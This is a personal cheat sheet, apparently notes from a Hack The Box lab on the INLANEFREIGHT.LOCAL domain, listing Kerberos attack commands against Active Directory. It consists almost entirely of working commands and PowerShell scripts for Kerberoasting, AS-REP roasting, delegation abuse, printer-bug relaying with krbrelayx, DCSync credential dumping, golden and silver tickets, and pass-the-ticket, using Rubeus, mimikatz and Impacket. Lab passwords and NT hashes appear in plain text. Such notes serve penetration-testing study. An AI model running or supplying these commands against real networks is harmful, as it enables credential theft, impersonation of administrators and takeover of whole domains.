Comment on page
Kerberos Attacks
# Request 1 Ticket
GetUsersSPNs.py -dc-ip <ip> <domain/<user> -request-user <username>
# Request All Tickets
GetUsersSPNs.py -dc-ip <ip> <domain/<user --request
# Save to Output
GetUserSPNs.py -dc-ip <ip> INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs
# Crack TGS Ticket
hashcat -m 13100 file.tgs $ROCKYOU
# Find Accounts with SPN
setspn.exe -Q */*
# Better Command
setspn.exe -T INLANEFREIGHT.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
# Enable Base64 Output
base64 /out:true
# Export Tickets
kerberos::list /export
# Modify To Better Format
echo "<base64 blob>" | tr -d \\n
# Output To John Format
cat encoded_file | base64 -d > sqldev.kirbi
# Make to John Format
python2.7 kirbi2john.py sqldev.kirbi
# HashCat Way, Modify to hashcat format
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'
# Import Module
Import-Module .\PowerView.ps1
# List Users With SPN
Get-DomainUser * -spn | select samaccountname
# Target Single User + Hashcat Output
Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
# /Stats
.\Rubeus.exe kerberoast /stats
# List Admin Privileges Users for Kerberoasting
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
# Set password
$SecPassword = ConvertTo-SecureString '0xF0rk123!' -AsPlainText -Force
# Set Proper Login
$Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\backupadm', $SecPassword)
# Use Command with Credentials
get-domainuser -spn -credential $Cred | select samaccountname
# Check HTTP Ticket Present
klist
# Configure PSSession
Register-PSSessionConfiguration -Name backupadmsess -RunAsCredential inlanefreight\backupadm
# Connect
Enter-PSSession -ComputerName DEV01 -Credential INLANEFREIGHT\backupadm -ConfigurationName backupadmsess
# PowerView: Discover Account with Pre-Authentication Disbaled
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | select samaccountname,useraccountcontrol
# Rubeus: Enumerate all user Accounts for Pre-Authentication
Rubeus.exe asreproast /format:hashcat
# Rubeus
.\Rubeus.exe asreproast /user:jenna.smith /domain:inlanefreight.local /dc:dc01.inlanefreight.local /nowrap /outfile:hashes.txt
# Crack the Hash
hashcat.exe -m 18200 hashes $ROCKYOU
Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose
GetNPUsers.py inlanefreight.local/pixis -request
GetNPUsers.py INLANEFREIGHT/ -dc-ip 10.129.205.35 -usersfile /tmp/users.txt -format hashcat -no-pass
$search = New-Object DirectoryServices.DirectorySearcher([ADSI]"")
$search.filter = "(&(objectCategory=person)(objectClass=user)(servicePrincipalName=*))"
$results = $search.Findall()
foreach($result in $results)
{
$userEntry = $result.GetDirectoryEntry()
Write-host "User"
Write-Host "===="
Write-Host $userEntry.name "(" $userEntry.distinguishedName ")"
Write-host ""
Write-host "SPNs"
Write-Host "===="
foreach($SPN in $userEntry.servicePrincipalName)
{
$SPN
}
Write-host ""
Write-host ""
}
# Run Script
.\FindSPNAccounts.ps1
# Find Accounts
Get-DomanUser -SPN | select samaccountname, serviceprincipalname,memberof
Invoke-Kerberoast
Rubeus.exe kerberoast /nowrap
https://www.semperis.com/blog/new-attack-paths-as-requested-sts/
In order to perform this attack, we need the following:
- 1.Username of an account with pre-authentication.
- 2.A target SPN.
Rubeus.exe kerberoast /nopreauth:amber.smith /domain:inlanefreight.local /spn:MSSQLSvc/SQL01:1433 /nowrap
Get Account SPN
GetUserSPNs.py inlanefreight.local/pixis -request
1 Monitor Stored Tickets (Rubeus)
.\Rubeus.exe monitor /interval:5 /nowrap
2 Using Captured Ticket to Request Another Ticket
.\Rubeus.exe asktgs /ticket:<base64> /service:cifs/dc01.INLANEFREIGHT.local /ptt
3 Using Newly ticket
dir \\dc01.inlanefreight.local\c$
https://github.com/leechristensen/SpoolSample
1 Monitor Tickets
.\Rubeus.exe monitor /interval:5 /nowrap
2 Abusing Printer Bug
.\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local
# Once Intercepted, we need to renew the ticket
.\Rubeus.exe renew /ticket:<base64> /ptt
# Since we haveTicket from dc01 and can dump all the hashes
lsadump::dcsync
# With DCSync, we are able to get all the hashes, we use the administrator hash to askTGT
.\Rubeus.exe asktgt /rc4:<NT-Hash> /user:<user> /ptt
# Perform Actions on DC01
dir \\dc01.inlanefreight.local\c$
Get-DomainUser -LDAPFilter "(userAccountControl:1.2.840.113556.1.4.803:=524288)" | select samaccountname, useraccountcontrol
https://github.com/dirkjanm/krbrelayx
# Host DNS Server
python dnstool.py -u INLANEFREIGHT.LOCAL\\pixis -p p4ssw0rd -r roguecomputer.INLANEFREIGHT.LOCAL -d 10.10.14.2 --action add 10.129.1.207
nslookup roguecomputer.inlanefreight.local dc01.inlanefreight.local
python addspn.py -u inlanefreight.local\\pixis -p p4ssw0rd --target-type samname -t sqldev -s CIFS/roguecomputer.inlanefreight.local dc01.inlanefreight.local
sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58
https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py
python3 printerbug.py inlanefreight.local/carole.rose:[email protected] fakepcs.inlanefreight.local
sudo python krbrelayx.py -hashes :cf3a5525ee9414229e66279623ed5c58
export KRB5CCNAME=<ccache>
secretsdump.py -k -no-pass dc01.inlanefreight.local
Get-DomainCoputer -TrustedAuth | select serviceprincipalname,dnshostname,useraccountcontrol
.\mimikatz.exe privilege::debug sekurlsa::msv exit
# Need Machine Hash as rc4
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:www/WS01.inlanefreight.local /altservice:HTTP /user:DMZ01$ /rc4:ff955e93a130f5bb1a6565f32b7dc127 /ptt
# Verify Ticket
klist
# Enter Session
Enter-PSSession ws01.inlanefreight.local
findDelegation.py INLANEFREIGHT.LOCAL/carole.rose:jasmine
getST.py -spn SERVER01 'INLANEFREIGHT.LOCAL/daniel.whitehead:dolphin' -impersonate Administrator
# Export ccache
export KRB5CCNAME=<ccache>
# Login
psexec.py -k -no-pass INLANEFREIGHT.LOCAL/administrator@DC01 -debug
# import the PowerView module
Import-Module C:\Tools\PowerView.ps1
# get all computers in the domain
$computers = Get-DomainComputer
# get all users in the domain
$users = Get-DomainUser
# define the required access rights
$accessRights = "GenericWrite","GenericAll","WriteProperty","WriteDacl"
# loop through each computer in the domain
foreach ($computer in $computers) {
# get the security descriptor for the computer
$acl = Get-ObjectAcl -SamAccountName $computer.SamAccountName -ResolveGUIDs
# loop through each user in the domain
foreach ($user in $users) {
# check if the user has the required access rights on the computer object
$hasAccess = $acl | ?{$_.SecurityIdentifier -eq $user.ObjectSID} | %{($_.ActiveDirectoryRights -match ($accessRights -join '|'))}
if ($hasAccess) {
Write-Output "$($user.SamAccountName) has the required access rights on $($computer.Name)"
}
}
}
# Import PowerMad
Import-Module .\Powermad.ps1
# Add New Computer
New-MachineAccount -MachineAccount HACKTHEBOX -Password $(ConvertTo-SecureString "Hackthebox123+!" -AsPlainText -Force)
- 1.Obtain Computer SID.
- 2.Use SDDL to create a security descriptor
- 3.Set
msDS-AllowedToActOnBehalfOfOtherIdentity
in raw binary format. - 4.Modify the target computer.
# Import PowerView
Import-Module .\PowerView.ps1
# Step 1
$ComputerSid = Get-DomainComputer HACKTHEBOX -Properties objectsid | Select -Expand objectsid
# Step 2
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
# Step 3
$credentials = New-Object System.Management.Automation.PSCredential "INLANEFREIGHT\carole.holmes", (ConvertTo-SecureString "Y3t4n0th3rP4ssw0rd" -AsPlainText -Force)
# Step 4
Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Credential $credentials -Verbose
.\Rubeus.exe hash /password:Hackthebox123+! /user:HACKTHEBOX$ /domain:inlanefreight.local
# /altservice:host,RPCSS,wsman,http,ldap,krbtgt,winrm
.\Rubeus.exe s4u /user:HACKTHEBOX$ /rc4:CF767C9A9C529361F108AA67BF1B3695 /impersonateuser:administrator /msdsspn:cifs/dc01.inlanefreight.local /ptt
# Connect to DC
ls \\dc01.inlanefreight.local\c$
addcomputer.py -computer-name 'HACKTHEBOX$' -computer-pass Hackthebox123+\! -dc-ip 10.129.96.44 inlanefreight.local/carole.holmes:'Y3t4n0th3rP4ssw0rd'
https://raw.githubusercontent.com/tothi/rbcd-attack/master/rbcd.py
python3 rbcd.py -dc-ip 172.16.8.35 -t DC01 -f HACKTHEBOX 'inlanefreight.local/annette.jackson:horses'
getST.py -spn cifs/DC01.inlanefreight.local -impersonate Administrator -dc-ip 10.129.96.44 inlanefreight.local/HACKTHEBOX:Hackthebox123+\!
# Export ccache
export KRB5CCNAME=<ccache>
# psexec
psexec.py -k -no-pass dc01.inlanefreight.local
We need 4 elements in order to perform a Golden Ticket attack.
- 1.Domain Name
- 2.Domain SID
- 3.KRBTGT's Hash
- 4.Username to impersonate
Get-Domain
Get-DomainSID
.\mimikatz.exe privilege::debug "lsadump::dcsync /user:krbtgt /domain:inlanefreight.local" exit
.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:c0231bd8a4a4de92fca0760c0ba9e7a6 /ptt" "exit"
Enter-PSSession dc01
lookupsid.py inlanefreight.local/[email protected] -domain-sids
ticketer.py -nthash c0231bd8a4a4de92fca0760c0ba9e7a6 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local Administrator
export KRB5CCNAME=<ccache>
# Login
psexec.py -k -no-pass dc01.inlanefreight.local
Get-DomainSid
Without this account, a silver ticket is not possible
.\mimikatz.exe "kerberos::golden /domain:inlanefreight.local /user:Administrator /sid:S-1-5-21-1870146311-1183348186-593267556 /rc4:027c6604526b7b16a22e320b76e54a5b /target:sql01.inlanefreight.local /service:cifs /ptt" "exit"
# Create Process
Rubeus.exe createnetonly /program:cmd.exe /show
# Import Silver Ticket
Rubeus.exe ptt /ticket:sql01.kirbi
# Login
PSExec.exe -accepteula \\sql01.inlanefreight.local cmd
lookupsid.py inlanefreight.local/[email protected] -domain-sids
ticketer.py -nthash 542780725df68d3456a0672f59001987 -domain-sid S-1-5-21-1870146311-1183348186-593267556 -domain inlanefreight.local -spn cifs/sql01.inlanefreight.local Administrator
export KRB5CCNAME=<ccache>
# Login
smbclient.py -k -no-pass sql01.inlanefreight.local
Pass-the-Ticket takes the user's Ticket Granting Ticket (TGT) or Ticket Granting Service (TGS) Ticket. The TGT is a signed ticket that contains a list of privilege levels. This TGT is passed to the Domain Controller, which will grant the TGS Ticket that can be used to access machines. Stealing either of these tickets makes it possible to perform lateral movement.
.\Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show
.\rubeus.exe triage
# krbtgt/INLANEFREIGHT.LOCAL
.\Rubeus.exe dump /luid:0x89275d /service:krbtgt /nowrap
Rubeus.exe renew /ticket:<base64> /ptt
dir \\dc01\\c$
Last modified 5mo ago